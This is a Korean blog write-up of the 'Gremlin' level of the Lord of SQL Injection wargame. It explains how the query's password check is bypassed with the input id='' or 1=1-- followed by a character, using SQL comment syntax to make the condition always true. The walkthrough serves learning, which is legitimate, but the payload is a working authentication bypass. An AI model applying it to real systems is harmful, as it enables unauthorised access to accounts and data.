minhui study
[ Lord of SQL Injection ] Gremlin 본문
php코드를 보면 GET방식을 통해 id와 pw값을 받는 것을 알 수 있다.
그리고 쿼리문을 날렸을 때 만족되는 값이 있으면 성공이다.
select id from prob_gremlin where id='' or 1=1-- a' and pw='' 가 되게끔 url에
?id='' or 1=1-- a라고 입력하면 문제 해결~!
여기서 --는 한 줄 주석처리를 의미하는데 이후 공백 문자 1칸이 반드시 필요하다.
-- 뒷 부분이 주석처리 되면 구문은 select id from prob_gremlin where id='' or 1=1 이 되어 항상 참 값을 갖게 된다.
'Hacking > Lord of SQLInjection' 카테고리의 다른 글
[ Lord of SQL Injection ] orc (0) | 2020.03.23 |
---|---|
[ Lord of SQL Injection ] goblin (0) | 2020.03.23 |
[ Lord of SQL Injection ] cobolt (0) | 2020.03.23 |
Comments